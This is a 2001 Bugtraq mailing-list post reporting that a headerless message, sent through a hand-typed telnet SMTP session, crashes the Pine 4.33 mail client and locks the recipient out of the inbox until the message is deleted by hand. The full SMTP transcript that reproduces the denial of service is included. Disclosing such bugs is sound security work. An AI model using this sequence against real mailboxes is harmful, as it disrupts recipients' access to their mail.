Date: Tue, 31 Jul 2001 16:20:07 -0400 (EDT)
From: SecLists <lists@secure.stargate.net>
To: bugtraq@securityfocus.com
Subject: Pine / IMAP bug?
I am not sure if this is a known issue but here goes:
By sending a small message by directly telnetting to port 25 and doing the
following I was able to crash Pine:
(someone@somehost) ~ > telnet some.mail.server 25
Trying xxx.xxx.xxx.xxx...
Connected to some.mail.server.
Escape character is '^]'.
220 Unauthorized use prohibited.
helo interrogation
250 Unauthorized use prohibited.
mail from: <someone@emailaddress.com>
250 ok
rcpt to: <someoneelse@emailaddress.com>
250 ok
data
354 go ahead
this is a test to see if it crashes pine...
.
250 ok 996609784 qp 13171
quit
221 Unauthorized use prohibited.
Connection closed by foreign host.
The SMTP server above is Solaris 7 running qmail.
IMAP server is OpenBSD 2.8 running qmail and courier imap.
Client is Pine 4.33 on OpenBSD 2.8.
Pine brings down the message but since it has no header info, it is left
blank in the message index. Then when you try to select any message, it
gives: MAIL FOLDER "INBOX" CLOSED DUE TO ACCESS ERROR. Exiting pine and
restarting was a no go as well.
The only way to get Pine running again was by actually entering the
Maildir and deleting the message manually.
Thanks,
Shawn